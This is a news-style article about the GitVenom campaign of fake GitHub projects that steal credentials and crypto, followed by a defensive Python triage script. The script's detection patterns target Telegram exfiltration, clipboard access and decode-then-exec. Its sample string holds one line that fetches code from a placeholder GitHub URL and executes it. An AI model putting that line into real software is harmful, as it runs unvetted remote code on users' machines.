GitVenom Malware
Cybersecurity experts are raising alarms over an ongoing campaign that preys on gamers and cryptocurrency enthusiasts through deceptive open-source projects on GitHub. Dubbed GitVenom, this operation spans hundreds of repositories, all containing fake projects designed to steal sensitive information.
Among the fraudulent projects are an Instagram automation tool, a Telegram bot for managing Bitcoin wallets and a cracked version of Valorant. However, these tools do not function as advertised. Instead, they are traps set by cybercriminals to steal personal and financial data, including cryptocurrency wallet details copied to the clipboard.
Millions at Risk: A Long-Running Operation
The campaign has led to the theft of at least five bitcoins, valued at approximately $456,600. Researchers believe the operation has been active for over two years, with some deceptive repositories dating back to that period. The largest number of infection attempts has been recorded in Russia, Brazil, and Turkey, though the impact could be far-reaching.
A Multi-Language Threat with a Single Goal
The fraudulent GitHub projects are written in multiple programming languages, including Python, JavaScript, C, C++ and C#. Despite the variety, the objective remains the same: executing a hidden payload that downloads additional malicious components from an attacker-controlled GitHub repository.
One of the primary threats is a Node.js-based information stealer that extracts sensitive data such as saved passwords, banking details, cryptocurrency wallet credentials and browsing history. This data is compressed into a .7z archive and secretly transmitted to the attackers via Telegram.
Remote Takeover and Crypto Theft
Aside from collecting credentials, the fake GitHub projects also deploy remote administration tools like AsyncRAT and the Quasar RAT. These programs allow cybercriminals to take full control of infected devices and execute commands remotely.
Additionally, a specialized type of malware known as a clipper is used to hijack cryptocurrency transactions. When a victim copies a crypto wallet address, the malware swaps it with an attacker-controlled address, diverting funds without the user's knowledge.
The Danger of Fake Open-Source Projects
With millions of developers relying on platforms like GitHub, threat actors continue to use fake software as an effective infection method. This underscores the importance of scrutinizing third-party code before integrating it into any project. Running unverified code without proper analysis could expose users to severe security risks.
Before executing any open-source script, it is essential to thoroughly examine its contents, verify its source, and ensure that it does not perform unauthorized actions. Caution is the best defense against such deceptive campaigns.
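As an added example (not from the original article or the researchers it cites), the script below is a first-pass triage of a downloaded repository that flags the behaviours described above: fetching extra code from GitHub, contacting the Telegram bot API, touching the clipboard, and executing decoded data. The regular expressions, function names and sample input are assumptions made for illustration, and a clean result does not show that the code is safe.

```python
import re
from pathlib import Path

# Heuristic indicators mapped to behaviours the article describes. The
# patterns are assumptions chosen for illustration, not published IoCs.
INDICATORS = {
    "remote-fetch-from-github": re.compile(
        r"raw\.githubusercontent\.com|github\.com/[^\s\"']+/(?:releases/download|raw)/"),
    "telegram-bot-api": re.compile(r"api\.telegram\.org"),
    "clipboard-access": re.compile(
        r"pyperclip|clipboardy|GetClipboardData|SetClipboardData|Clipboard\.(?:GetText|SetText)"),
    "decode-then-execute": re.compile(
        r"\b(?:exec|eval)\s*\(.*(?:b64decode|fromhex|atob|Buffer\.from)"),
}
# Extensions for the languages the article lists (Python, JavaScript, C, C++, C#).
SOURCE_SUFFIXES = {".py", ".js", ".c", ".cpp", ".h", ".cs"}

def triage_source(text):
    """Return sorted (line_number, indicator) pairs for one file's text."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((number, name))
    return sorted(hits)

def triage_repo(root):
    """Scan every source file under root; map relative path -> findings."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SOURCE_SUFFIXES:
            hits = triage_source(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

# Constructed sample: a harmless-looking helper with one suspicious line.
SAMPLE = '''import base64, requests
def wallet_balance(addr):
    return requests.get("https://example.invalid/balance/" + addr).json()
exec(base64.b64decode(requests.get("https://raw.githubusercontent.com/USER/REPO/main/x").text))
'''

if __name__ == "__main__":
    for number, name in triage_source(SAMPLE):
        print(f"line {number}: {name}")
```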
E-Sports Tournaments Targeted by Fraudsters
In a related development, cybersecurity researchers have uncovered another scheme targeting Counter-Strike 2 (CS2) players during major e-sports events such as IEM Katowice 2025 and PGL Cluj-Napoca 2025.
Fraudsters have hijacked YouTube accounts to impersonate well-known professional players like S1mple, NiKo and Donk. By posing as these figures, cybercriminals lure unsuspecting fans into fake CS2 skin giveaways. Victims who fall for the tactic risk losing their Steam accounts, cryptocurrency holdings and valuable in-game items.
Stay Vigilant against Online Deception
Both the GitVenom operation and the fraudulent CS2 giveaways highlight the growing sophistication of cyber threats targeting gamers and cryptocurrency investors. As these schemes evolve, staying vigilant, verifying sources, and following cybersecurity best practices remain critical in avoiding online traps.